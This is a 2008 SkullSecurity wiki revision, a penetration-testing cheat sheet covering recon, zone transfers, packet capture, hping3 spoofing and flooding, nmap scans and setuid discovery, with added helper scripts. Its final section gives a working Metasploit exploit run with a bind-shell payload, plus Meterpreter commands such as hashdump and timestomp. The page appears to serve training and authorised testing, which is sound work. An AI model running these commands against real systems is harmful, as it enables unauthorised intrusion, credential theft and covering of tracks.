Difference between revisions of "Linux Commands"

From SkullSecurity
Revision as of 16:04, 16 July 2008

Recon

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
  • Zone transfer
$ dig [@server] <domain> -t AXFR

  • Incremental zone transfer (IXFR: only the changes since zone serial N)
$ dig [@server] <domain> -t IXFR=<N>
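
Zone transfers are worth scripting, since each NS for a domain has to be tried separately and a transfer that succeeds is a full host list in one shot. The following is an added example, not a command from the original page: it tries AXFR against every authoritative server returned by `dig +short NS` and reduces a transfer to "name ip" pairs with awk. The sample transfer inside `sample_axfr` is constructed for the example; example.com, its servers and the 10.10.10.10 host are assumptions, not real data.

```shell
#!/bin/sh
# Added example (not from the SkullSecurity page): try a zone transfer against
# every authoritative server of a domain, then reduce the transfer to a host list.
# The sample transfer in sample_axfr is constructed; example.com is an assumption.

# try_axfr DOMAIN: ask each NS for a full transfer, print the first one that works.
# A refused transfer prints only ";" comment lines (e.g. "; Transfer failed."),
# so a real transfer is recognised by the SOA record that opens it.
try_axfr() {
    domain=$1
    for ns in $(dig +short NS "$domain"); do
        out=$(dig "@$ns" "$domain" AXFR) || continue
        if printf '%s\n' "$out" | grep -q '[[:space:]]SOA[[:space:]]'; then
            printf '%s\n' "$out"
            return 0
        fi
    done
    return 1
}

# axfr_hosts: read dig AXFR output on stdin, print "name ip" for each A record
# (trailing dot of the FQDN removed), sorted and de-duplicated. Comment lines
# starting with ";" never have "IN" in field 3, so they are skipped.
axfr_hosts() {
    awk '$3 == "IN" && $4 == "A" { sub(/\.$/, "", $1); print $1, $5 }' | sort -u
}

# sample_axfr: constructed AXFR answer in dig's output format, for offline use.
sample_axfr() {
    cat <<'EOF'
example.com.            3600    IN      SOA     ns1.example.com. hostmaster.example.com. 2008071601 7200 3600 1209600 3600
example.com.            3600    IN      NS      ns1.example.com.
example.com.            3600    IN      MX      10 mail.example.com.
ns1.example.com.        3600    IN      A       192.0.2.53
mail.example.com.       3600    IN      A       192.0.2.25
www.example.com.        3600    IN      A       192.0.2.80
intranet.example.com.   3600    IN      A       10.10.10.10
example.com.            3600    IN      SOA     ns1.example.com. hostmaster.example.com. 2008071601 7200 3600 1209600 3600
EOF
}

# Against a live domain: try_axfr example.com | axfr_hosts
# Offline, on the constructed sample:
sample_axfr | axfr_hosts
```

Internal names such as intranet.example.com pointing at RFC 1918 space are the usual payoff of a successful transfer; a server that answers AXFR to arbitrary clients should be reported as a finding in its own right.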

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

Scanning

tcpdump

Parameters

  • -n -- use numbers
  • -i <interface>
  • -v -- be verbose
  • -r <file>/-w <file> -- read from/write to file
  • -x -- print hex
  • -A -- print ASCII
  • -X -- print hex and ASCII
  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol
    • ether, ip, ip6, arp, rarp, tcp, udp
  • Type
    • host <host>
    • net <network>
    • port <portnum>
    • portrange <start-end>
  • Direction
    • src
    • dst
  • Logic
    • and
    • or
  • Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest
  • --interface <int>

Source selection

  • --spoof <hostname>
  • --rand-source

Port selection

  • --destport <port>
  • --destport +<port> -- increment by one for each packet received
  • --destport ++<port> -- increment by one for each packet sent
  • --scan <portrange>
  • --baseport <port>
  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood
  • --interval <N> -- interval in seconds
  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>
  • --beep
  • --file <filename>
  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL
  • -g <hostlist> -- Loose source route
  • -I -- use ICMP Echo instead of UDP
  • -m <N> -- maximum number of hops (default 30)
  • -n -- numeric
  • -p <baseport> -- set the base UDP port
  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

  • -u -- use UDP
  • -p -- use ICMP echo
  • -d <port> -- destination port (default 80)
  • -s <port> -- source port
  • -L <N> -- length (including layer 3/4 header)
  • -A -- look up AS number
  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping, treat every host as up (spelled -Pn in current releases)
  • -PB -- default in older releases: ICMP Echo + TCP to port 80
  • -PE -- ICMP Echo request
  • -PS[portlist] -- TCP SYN
  • -PP -- ICMP Timestamp request
  • -PM -- ICMP Address Mask request
  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan
  • -sS -- SYN scan
  • -sA -- ACK scan
  • -sF -- FIN scan
  • -sN -- Null scan
  • -sX -- Xmas Tree scan
  • -sM -- Maimon scan
  • --scanflags specify your own flags
  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint
  • -sV -- Version scan

Scripts

  • -sC -- run the default script category (same as --script=default), not every script
  • --script=<category|directory|script|expression>
  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
  • --host-timeout, --max-rtt-timeout, --min-rtt-timeout, --initial-rtt-timeout, --max-parallelism, --scan-delay

Other options

  • -p<ports>
  • -F -- fast (scans fewer ports than the default: the most common ones from nmap-services)
  • --packet-trace
  • --traceroute
  • --badsum
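
The options above are usually combined into a single scan whose results feed the next step, so the useful thing to script is the output rather than the invocation. The following is an added example, not from the original page: it parses nmap's grepable output (`-oG`) into one "host port proto service" line per open port, which is the form amap, netcat sweeps or an exploit list want. The scan lines in `sample_gnmap` are constructed for the example; the hosts, services and versions are assumptions.

```shell
#!/bin/sh
# Added example (not from the SkullSecurity page): turn "nmap -oG" output into a
# flat "host port proto service" list. The scan in sample_gnmap is constructed.

# A scan that produces the input: SYN scan, version detection, no ping,
# grepable output to a file:
#   nmap -sS -sV -Pn -oG scan.gnmap 10.10.10.0/24

# gnmap_open: read -oG output on stdin, print one line per open port.
# Fields are tab-separated; the Ports field lists
# port/state/proto/owner/service/rpcinfo/version/ entries separated by ", ".
gnmap_open() {
    awk -F'\t' '
        /^Host:/ && /Ports:/ {
            split($1, h, " "); ip = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, ports, /, */)
                for (j = 1; j <= n; j++) {
                    split(ports[j], f, "/")
                    # only "open"; "open|filtered" (UDP) and "closed" are dropped
                    if (f[2] == "open") print ip, f[1], f[3], f[5]
                }
            }
        }'
}

# sample_gnmap: constructed -oG lines, tab-separated as nmap writes them.
sample_gnmap() {
    printf 'Host: 10.10.10.10 ()\tStatus: Up\n'
    printf 'Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1//, 80/open/tcp//http//Apache httpd 2.4.52//, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
    printf 'Host: 10.10.10.11 ()\tPorts: 25/open/tcp//smtp//Postfix smtpd//, 53/open|filtered/udp//domain///\n'
}

# On a real scan: gnmap_open < scan.gnmap
# Offline, on the constructed sample:
sample_gnmap | gnmap_open
```

Grepable output is one line per host, so this stays a one-pass awk job; for anything richer (script output, OS guesses) parse the XML (`-oX`) instead.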

THC amap

Options

  • -q -- quiet (omit closed ports)
  • -v -- verbose
  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @<target>

netcat

Options

  • -l -- listen mode
  • -L -- listen harder (Windows only)
  • -u -- UDP mode
  • -p -- local port (in listen mode, the port to listen on)
  • -e -- program to execute
  • -n -- don't resolve names
  • -z -- don't send any data
  • -w<N> -- timeout for connects
  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 <target> <port-range>

Exploitation

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in $(locate -r "bin$"); do find "$i" -type f \( -perm -4000 -o -perm -2000 \) -print; done
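
The per-directory lines above can be collapsed into one walk, and the list becomes far more useful when compared against a baseline taken from a known-good host, since a setuid binary that was not there before is what you actually want to see. The following is an added example, not from the original page: `find_privileged` does the single walk (staying on the starting filesystem so /proc and network mounts are skipped), and `privileged_baseline_diff` prints what is new relative to a saved list. The `demo` function builds a scratch directory so the logic can be exercised without root; its file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the SkullSecurity page): one find over the tree plus a
# baseline comparison, so a newly appeared setuid/setgid binary stands out.

# find_privileged [DIR...]: list setuid or setgid regular files under DIR
# (default /). -xdev keeps the walk on the starting filesystem; errors from
# unreadable directories are dropped so the list stays clean.
find_privileged() {
    [ $# -gt 0 ] || set -- /
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# privileged_baseline_diff BASELINE [DIR...]: print privileged files present now
# that are absent from BASELINE (a sorted file of paths, e.g. from a clean host).
privileged_baseline_diff() {
    baseline=$1; shift
    find_privileged "$@" | sort | comm -13 "$baseline" -
}

# demo: scratch tree with two setuid files and one plain file; the baseline is
# recorded without new_suid_bin, so the diff reports exactly that path.
# Setting the setuid bit on a file you own needs no root.
demo() {
    t=$(mktemp -d)
    touch "$t/suid_bin" "$t/plain_bin" "$t/new_suid_bin"
    chmod 4755 "$t/suid_bin" "$t/new_suid_bin"
    chmod 0755 "$t/plain_bin"
    find_privileged "$t" | sort > "$t/baseline"
    grep -v new_suid_bin "$t/baseline" > "$t/baseline.old"
    privileged_baseline_diff "$t/baseline.old" "$t"   # prints .../new_suid_bin
    rm -rf "$t"
}

# On a real host: find_privileged | sort > /root/setuid.baseline (once), later
# privileged_baseline_diff /root/setuid.baseline
demo
```

Note that `find / -xdev` only covers the root filesystem; run it once per mounted filesystem (`df -l`) if /usr or /home are separate, and remember that a nosuid mount makes the bit harmless even though find still reports it.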

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smb/ms05_039_pnp
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i <N>

Meterpreter

Filesystem commands

> cd
> lcd 
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>

Modules

> use <modulename>
> use priv
> hashdump
> timestomp